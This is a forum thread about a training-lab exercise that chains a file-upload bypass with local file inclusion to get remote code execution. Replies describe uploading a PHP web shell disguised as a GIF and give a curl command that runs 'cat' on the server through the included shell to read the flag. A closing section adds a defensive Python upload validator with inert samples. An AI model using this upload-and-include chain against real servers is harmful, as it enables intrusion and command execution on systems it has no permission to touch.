[File Inclusion][LFI and File Uploads]

Hey guys. Can someone help me with this question?
Use any of the techniques covered in this section to gain RCE and read the flag at /
I go to this http://159.65.81.40:30186/settings.php URL and it just gives me a "file not allowed" error when I click on upload. I saw the requests with Burp, and this is the POST request after clicking on the upload button. Can somebody help me please?

POST /upload.php HTTP/1.1
Host: 159.65.81.40:30186
Content-Length: 150
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXGg68SiXvWXYKlUF
Origin: http://159.65.81.40:30186
Referer: http://159.65.81.40:30186/settings.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundaryXGg68SiXvWXYKlUF
Content-Disposition: form-data; name="uploadFile"

undefined
------WebKitFormBoundaryXGg68SiXvWXYKlUF--

You have to create the code and save it as a gif, upload the file, and then execute it. In the end, where it says =id, you can keep changing to search for the file path.

Hi, I’m also having trouble with this. I did just as the section said and created a code and saved it as a gif. When I uploaded it, it worked and it did show id. When I list the / directory I also found a txt file, which contains the string “GIF8” in it. Unfortunately, it is not the answer to the question. I’m really stuck and don’t know what to do.

The file has the magic bytes prefixing it. Drop the GIF8 and cat the file.

curl -s "http://<SERVER>:<PORT>/index.php?language=./profile_images/shell.gif&cmd=cat+/2f40d853e2d4768d87da1c81772bae0a.txt" | grep HTB


Thank you so much. The magic bytes prefixing part is where it stumped me, and I’m not that good with curl. Thank you so much for the help.

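The "GIF8" prefix discussed in this thread passes any upload filter that trusts magic bytes alone. As an added example (not from the thread or the lab's code), this Python validator contrasts that weak check with a structural GIF parse plus a scan for PHP open tags; all function names and sample bytes are constructed for illustration.

```python
import re
# Heuristic: can also match random binary data, so treat a hit as "quarantine or re-encode".
PHP_TAG = re.compile(rb"<\?(php|=|\s)", re.I)

def magic_only(data):  # weak check: trusts the leading magic bytes only
    return data.startswith(b"GIF8")

def skip_subblocks(data, i):  # sub-blocks: length byte + payload, a 0 length ends the run
    while data[i] != 0:
        i += data[i] + 1
    return i + 1

def gif_structure_ok(data):  # True only for a complete GIF with nothing after the trailer
    try:
        if data[:6] not in (b"GIF87a", b"GIF89a"):
            return False
        i = 13                                   # header + logical screen descriptor
        if data[10] & 0x80:                      # global color table present
            i += 3 * (2 << (data[10] & 0x07))
        while True:
            if data[i] == 0x3B:                  # trailer must be the last byte
                return i + 1 == len(data)
            if data[i] == 0x21:                  # extension: label, then sub-blocks
                i = skip_subblocks(data, i + 2)
            elif data[i] == 0x2C:                # image descriptor
                packed = data[i + 9]
                i += 10
                if packed & 0x80:                # local color table
                    i += 3 * (2 << (packed & 0x07))
                i = skip_subblocks(data, i + 1)  # +1 skips the LZW minimum code size
            else:
                return False
    except IndexError:                           # truncated or inconsistent lengths
        return False

def upload_verdict(data):
    if not magic_only(data):
        return "reject: not a GIF"
    if PHP_TAG.search(data):
        return "reject: PHP open tag in image bytes"
    if not gif_structure_ok(data):
        return "reject: malformed GIF"
    return "accept"
# Constructed samples: a minimal 1x1 GIF, a magic-bytes-only file, a GIF comment carrying PHP.
VALID_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
             b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3b")
INERT = b"<?php /* placeholder */ ?>"
POLYGLOT = b"GIF8\n" + INERT
COMMENT_GIF = VALID_GIF[:-1] + b"\x21\xfe" + bytes([len(INERT)]) + INERT + b"\x00\x3b"
```

The comment-extension sample parses as a valid GIF and is caught only by the tag scan, which is why uploads should also be re-encoded server-side and stored where the application cannot include them.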